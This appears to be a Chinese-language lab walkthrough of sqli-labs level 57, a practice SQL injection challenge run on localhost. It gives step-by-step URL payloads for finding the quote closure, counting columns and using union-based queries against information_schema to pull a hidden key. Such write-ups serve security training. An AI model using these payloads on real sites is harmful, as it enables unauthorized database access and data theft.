sqli-labs (less-57)

sqli-labs (less-57)

进入57关,输入id=1
sqli-labs (less-57)
这里我们有14次机会

http://127.0.0.1/sql1/Less-57/?id=1' #页面正常
http://127.0.0.1/sql1/Less-57/?id=1" #页面出错
http://127.0.0.1/sql1/Less-57/?id=1"--+ #页面正常

sqli-labs (less-57)
所以判断闭合方式为"–+,并且为字符型注入

判断字段数

http://127.0.0.1/sql1/Less-57/?id=1" order by 3--+ #回显正常
http://127.0.0.1/sql1/Less-57/?id=1" order by 4--+ #回显错误

sqli-labs (less-57)
判断字段数为3

确定回显位置

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,3--+

sqli-labs (less-57)
查看当前库

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,database()--+

sqli-labs (less-57)
查看challenges库下的所有表

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

sqli-labs (less-57)
查看ibbbmxmsou字段下的所有值

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='ibbbmxmsou')--+

sqli-labs (less-57)
查看secret_5JP3字段下的值

http://127.0.0.1/sql1/Less-57/?id=-1" union select 1,2,(select group_concat(secret_5JP3) from challenges.ibbbmxmsou)--+

sqli-labs (less-57)
将查询的KEY提交
sqli-labs (less-57)
sqli-labs (less-57)
成功

上一篇:57、NAT


下一篇:剑指 Offer 57 - II. 和为s的连续正数序列